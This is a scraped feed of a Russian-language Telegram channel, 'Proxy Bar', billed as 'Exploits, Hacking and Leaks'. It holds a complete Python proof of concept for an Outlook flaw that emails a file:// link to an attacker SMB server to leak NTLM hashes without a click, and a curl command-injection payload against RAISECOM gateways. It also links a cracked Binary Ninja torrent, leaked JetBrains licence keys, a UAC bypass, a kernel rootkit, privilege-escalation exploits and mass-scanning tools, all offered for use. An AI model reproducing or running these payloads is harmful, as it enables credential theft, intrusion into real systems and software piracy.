Proxy Bar – Telegram
Proxy Bar
19.6K subscribers
1.28K photos
76 videos
664 files
1.32K links
Exploits, Hacking and Leaks

Чат группы - https://news.1rj.ru/str/chat_proxy_bar

Связь с администрацией и реклама:
@NULL_vm

Поддержать проект:
BTC bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker
Download Telegram
2024-21413 /outlook RCE
*
POC

import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

def send_email():
# Get user input for sender's email address and password
sender_email = input("Enter your Outlook email address: ")
sender_password = input("Enter your Outlook email password: ")

# Get user input for receiver's email address
receiver_email = input("Enter the recipient's email address: ")

# Create a new message object
msg = MIMEMultipart()

# Add sender, receiver, and subject to the message
msg['From'] = sender_email
msg['To'] = receiver_email
msg['Subject'] = input("Enter email subject: ")

# Ask user if they want to add a link attachment
add_attachment = input("Do you want to add a link attachment? (yes/no): ").lower()
if add_attachment == 'yes':
html_content = """\
<!DOCTYPE html>
<html lang="en">
<body>
<p><a href="file:///\\192.168.206.139/test/Doc.txt!xssvideo">Salary docs</a></p>
</body>
</html>"""
msg.attach(MIMEText(html_content, 'html'))

# Connect to SMTP server and send email
with smtplib.SMTP('smtp-mail.outlook.com', 587) as server:
server.starttls()
server.login(sender_email, sender_password)
server.send_message(msg)
print("Email sent successfully.")

if __name__ == "__main__":
send_email()


Но есть пара НО:
1. В строке 27 вам необходимо указать путь к файлу на вашем сервере (линк на rtf например)
2. На линк жертве кликать не нужно, Office Protected View все сам сделает.
3. Было мнение что нужно находиться в LAN жертвы, но как бы есть пара минут пока port established

#outглюк #ntlm2
🔥18👍10
Binary Ninja 4.1 Final + crack
*
(Linux+windows+Mac версии)
*
magnet link
magnet:?xt=urn:btih:c392c1aab1786180413167e3b8345f0f9d1fc8c4&dn=binja_release_6
👍21
👍30🔥10😱6
.NET PROFILER DLL LOADING
*
Эксплойт загружает вредоносную DLL с помощью планировщика задач (MMC) для обхода UAC и получения прав администратора.
👍13🔥1
👍25🔥11😱3
TuDoor
*
Только не королевская династия, я скорее династия DNS.
В общем к сути, собралась как то в Окледе (богоспасаемые штаты) группа хитрых азиатов.
Слово за слово, все скатилось к перечитыванию RFC и трудов Дэна Камински (мир праху его),
основной тезис которого как известно гласит, пойди и отрави DNS ближнего своего.
Ну и как водится дочитались до дыр в BIND, PowerDNS и Microsoft DNS и всего сопутствующего.
*
Рекомендую к осмыслению саму страничку и линки внизу.
Среда чюваки

#DNS #DOS #cachepoison
👍17🔥3😱3
Прекрасное 🤣

#nightHumor
👍14🔥7😱5
CVE-2024-7120 RAISECOM Gateway Devices
*
WriteUp
*
Exploit command injection
curl 'http://<TARGET_IP>/vpn/list_base_config.php?type=mod&parts=base_config&template=`<INJECTED_SHELL_COMMAND>`' \
-H 'Accept: */*' \
-H 'Accept-Encoding: gzip, deflate' \
-H 'Connection: keep-alive'
👍5🔥3
This media is not supported in your browser
VIEW IN TELEGRAM
WhatsApp extension manipulation
*
Что с телегой, что вацапом, это даже комментировать не хочется, когда юзер сам ставит APK и дает ему разрешения.
Когда там последний zeroClick был, 2 года назад ? )
*
POC

#FU
👍24🔥8😱5
CVE-2024-36401 GeoServer
*
POC мы уже публиковали, но тут прям fullH0use
*
Полный exploit + модуль для Mass Scanning
*
Download exploit
🔥16👍1
JetBrains Keys
*
Ключи истекают 14 сентября 2026 г.
*
ВСЕ ПРОДУКТЫ !!!
*
Link
🔥45👍5
This media is not supported in your browser
VIEW IN TELEGRAM
Windows AppLocker Driver (appid.sys)
*
LPE
*
exploit

#windows #lpe
🔥19👍7
🔥20👍6😱1
shadow-rs
*
Windows Kernel Rootkit
*
Лангуаге: RUST
*
link

#rootkit #windows #rust
👍11🔥5
А вы читали когда либо спецификации на C&C ? 👍
*
Документ серьезный, даже RFC присутствует
*
Open Source C&C Specification
👍10🔥4
SLUBStick - атака на кэш ядра linux
*
Суть атаки сводится к перекрестному кэшированию ядра, перетекает из limited heap в возможность произвольного чтения и записи в памяти (а это LPE и escape docker).
Затестили на: ядра 5.9 и 6.2 _ x32/x64
Но то ладно, интересно другое, использовались 9 CVE -)
Но то ладно, защита ядер SMEP/SMAP/KASLR - в упор не видят атаки -)
*
В конце августа, будет конфа, где обещают всем участникам в гостиничном номере на подушку положат не шоколадку, а POC exploit
*
За то зарелизили сочный хрустящий PDF с жирным тех анализом и возможностью применения
*
Жирный хрустящий slubstick.pdf


#linux #vuln
🔥15👍6
Linux для пращуров и внуков и пенсионеров
*
OSEDUCONF - 2022 год
*
глянуть

#real_bad_ass
🔥18😱3
👍19
This media is not supported in your browser
VIEW IN TELEGRAM
SmartScreen - четыре новых метода по демонтажу
*
writeUP
*
repo
🔥14👍2
бгг
systemctl --revert-mylast-fuckup


#MUhumor
👍19🔥5